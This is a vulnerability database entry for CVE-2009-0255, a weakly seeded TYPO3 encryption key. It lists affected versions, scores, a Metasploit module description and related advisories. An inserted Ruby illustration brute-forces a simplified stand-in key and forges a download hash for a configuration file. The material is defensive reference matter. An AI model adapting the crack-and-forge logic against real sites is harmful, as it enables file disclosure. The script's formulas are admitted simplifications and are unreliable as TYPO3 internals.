ID CVE-2009-0255
Summary The System extension Install tool in TYPO3 4.0.0 through 4.0.9, 4.1.0 through 4.1.7, and 4.2.0 through 4.2.3 creates the encryption key with an insufficiently random seed, which makes it easier for attackers to crack the key.
References
Vulnerable Configurations
  • TYPO3 4.0
    cpe:2.3:a:typo3:typo3:4.0
  • TYPO3 4.0.1
    cpe:2.3:a:typo3:typo3:4.0.1
  • TYPO3 4.0.2
    cpe:2.3:a:typo3:typo3:4.0.2
  • TYPO3 4.0.3
    cpe:2.3:a:typo3:typo3:4.0.3
  • TYPO3 4.0.4
    cpe:2.3:a:typo3:typo3:4.0.4
  • TYPO3 4.0.5
    cpe:2.3:a:typo3:typo3:4.0.5
  • TYPO3 4.0.6
    cpe:2.3:a:typo3:typo3:4.0.6
  • TYPO3 4.0.7
    cpe:2.3:a:typo3:typo3:4.0.7
  • TYPO3 4.0.8
    cpe:2.3:a:typo3:typo3:4.0.8
  • TYPO3 4.0.9
    cpe:2.3:a:typo3:typo3:4.0.9
  • TYPO3 4.1.0
    cpe:2.3:a:typo3:typo3:4.1.0
  • TYPO3 4.1.0 rc1
    cpe:2.3:a:typo3:typo3:4.1.0:rc1
  • TYPO3 4.1.0 beta1
    cpe:2.3:a:typo3:typo3:4.1.0:beta1
  • TYPO3 4.1.1
    cpe:2.3:a:typo3:typo3:4.1.1
  • TYPO3 4.1.2
    cpe:2.3:a:typo3:typo3:4.1.2
  • TYPO3 4.1.3
    cpe:2.3:a:typo3:typo3:4.1.3
  • TYPO3 4.1.4
    cpe:2.3:a:typo3:typo3:4.1.4
  • TYPO3 4.1.5
    cpe:2.3:a:typo3:typo3:4.1.5
  • TYPO3 4.1.6
    cpe:2.3:a:typo3:typo3:4.1.6
  • TYPO3 4.1.7
    cpe:2.3:a:typo3:typo3:4.1.7
  • TYPO3 4.2.0
    cpe:2.3:a:typo3:typo3:4.2.0
  • TYPO3 4.2.1
    cpe:2.3:a:typo3:typo3:4.2.1
  • TYPO3 4.2.2
    cpe:2.3:a:typo3:typo3:4.2.2
  • TYPO3 4.2.3
    cpe:2.3:a:typo3:typo3:4.2.3
CVSS
Base: 5.0 (as of 23-01-2009 - 13:08)
Impact:
Exploitability:
CWE CWE-310
CAPEC
  • Signature Spoofing by Key Recreation
    An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.
Access
  • Vector: NETWORK
  • Complexity: LOW
  • Authentication: NONE
Impact
  • Confidentiality: PARTIAL
  • Integrity: NONE
  • Availability: NONE
metasploit via4
description This module exploits a flaw in TYPO3 encryption key creation process to allow for file disclosure in the jumpUrl mechanism. This flaw can be used to read any file that the web server user account has access to view.
id MSF:AUXILIARY/ADMIN/HTTP/TYPO3_SA_2009_001
last seen 2019-03-23
modified 2018-07-12
published 2011-11-07
reliability Normal
reporter Rapid7
source https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
title TYPO3 sa-2009-001 Weak Encryption Key File Disclosure
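The summary above and the Metasploit module description name the two halves of this bug: a key derived from a low-entropy, time-dependent seed, and a jumpUrl download check whose only secret is that key. The following Ruby script is an added illustration and is not code from the page, from TYPO3, or from the Rapid7 module. It assumes a stand-in derivation (MD5 of a PHP-uniqid()-style "seconds + microseconds" string) because the page does not show the Install tool's real formula, and it models the jumpUrl check as a ten-character prefix of MD5 over "path|location|key", a simplification of TYPO3's actual hash input. The file paths, the location string "1:", the install timestamp and the function names are all constructed for the demo.

```ruby
require 'digest/md5'
require 'securerandom'

# Illustrative weak derivation, NOT the Install tool's real code: the key is the
# MD5 of a PHP-uniqid()-style string, eight hex digits of epoch seconds followed
# by five hex digits of microseconds. Everything about it follows from the
# moment of installation, so a T-second window holds at most T * 10**6 keys.
def php_style_uniqid(sec, usec)
  format('%08x%05x', sec, usec)
end

def weak_key(sec, usec)
  Digest::MD5.hexdigest(php_style_uniqid(sec, usec))
end

# The corrected pattern: draw the key from the OS CSPRNG. 48 bytes = 384 bits,
# far beyond any brute-force window an attacker could enumerate.
def strong_key
  SecureRandom.hex(48)
end

# Stand-in for a jumpUrl-style download check (simplified, not TYPO3's exact
# input format): the server serves `path` only if the caller presents the first
# ten hex digits of MD5("path|location|key").
def short_hash(path, location, key)
  Digest::MD5.hexdigest("#{path}|#{location}|#{key}")[0, 10]
end

# Attacker side. One legitimate secure-download link on the site yields
# (path, location, hash). Walk every uniqid() value in the suspected install
# window, derive the key it would produce, and keep the one that reproduces the
# observed hash. usec_step > 1 coarsens the search; it exists only to keep the
# demo fast, a real attacker would step by 1.
def crack_key(path, location, observed_hash, window_start, window_seconds, usec_step: 1)
  (window_start...(window_start + window_seconds)).each do |sec|
    (0...1_000_000).step(usec_step) do |usec|
      candidate = weak_key(sec, usec)
      return candidate if short_hash(path, location, candidate) == observed_hash
    end
  end
  nil
end

# With the key recovered, the attacker can sign a request for any file the web
# server user can read; the server's check passes because it uses the same key.
def forge_download_hash(path, location, recovered_key)
  short_hash(path, location, recovered_key)
end

if __FILE__ == $0
  # Constructed scenario: a site installed at an assumed, known epoch second.
  install_sec, install_usec = 1_232_000_000, 4_242
  site_key   = weak_key(install_sec, install_usec)
  legit_hash = short_hash('fileadmin/report.pdf', '1:', site_key) # seen in a real link
  recovered  = crack_key('fileadmin/report.pdf', '1:', legit_hash, install_sec, 1)
  puts "recovered key: #{recovered}"
  puts "forged hash for typo3conf/localconf.php: #{forge_download_hash('typo3conf/localconf.php', '1:', recovered)}"
  puts "a CSPRNG-generated key looks like: #{strong_key}"
end
```

The point of the script is the size of the search: a few million MD5 computations per second of uncertainty about the install time, versus 2^384 for a key drawn from the CSPRNG. It also shows why the Debian advisory below insists on generating a fresh key after updating: the patched Install tool only affects keys created from then on, and a key that was already weak stays weak until it is replaced.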
nessus via4
  • NASL family FreeBSD Local Security Checks
    NASL id FREEBSD_PKG_653606E9F6AC11DD94D90030843D3802.NASL
    description Secunia reports : Some vulnerabilities have been reported in Typo3, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting and session fixation attacks, and compromise a vulnerable system. The 'Install tool' system extension uses insufficiently random entropy sources to generate an encryption key, resulting in weak security. The authentication library does not properly invalidate supplied session tokens, which can be exploited to hijack a user's session. Certain unspecified input passed to the 'Indexed Search Engine' system extension is not properly sanitised before being used to invoke commands. This can be exploited to inject and execute arbitrary shell commands. Input passed via the name and content of files to the 'Indexed Search Engine' system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Certain unspecified input passed to the Workspace module is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Note: It is also reported that certain unspecified input passed to test scripts of the 'ADOdb' system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected website.
    last seen 2019-02-21
    modified 2018-12-19
    plugin id 35624
    published 2009-02-09
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=35624
    title FreeBSD : typo3 -- multiple vulnerabilities (653606e9-f6ac-11dd-94d9-0030843d3802)
  • NASL family Debian Local Security Checks
    NASL id DEBIAN_DSA-1711.NASL
description Several remotely exploitable vulnerabilities have been discovered in the TYPO3 web content management framework. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2009-0255 Chris John Riley discovered that the encryption key used TYPO3-wide is generated with an insufficiently random seed resulting in low entropy which makes it easier for attackers to crack this key. - CVE-2009-0256 Marcus Krause discovered that TYPO3 is not invalidating a supplied session on authentication which allows an attacker to take over a victim's session via a session fixation attack. - CVE-2009-0257 Multiple cross-site scripting vulnerabilities allow remote attackers to inject arbitrary web script or HTML via various arguments and user-supplied strings used in the indexed search system extension, adodb extension test scripts or the workspace module. - CVE-2009-0258 Mads Olesen discovered a remote command injection vulnerability in the indexed search system extension which allows attackers to execute arbitrary code via a crafted file name which is passed unescaped to various system tools that extract file content for the indexing. Because of CVE-2009-0255, please make sure that besides installing this update, you also create a new encryption key after the installation.
    last seen 2019-02-21
    modified 2018-11-10
    plugin id 35463
    published 2009-01-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=35463
    title Debian DSA-1711-1 : typo3-src - several vulnerabilities
refmap via4
bid 33376
confirm http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/
debian DSA-1711
secunia
  • 33617
  • 33679
xf typo3-installtool-weak-security(48132)
Last major update 29-01-2009 - 00:00
Published 22-01-2009 - 18:30
Last modified 07-08-2017 - 21:33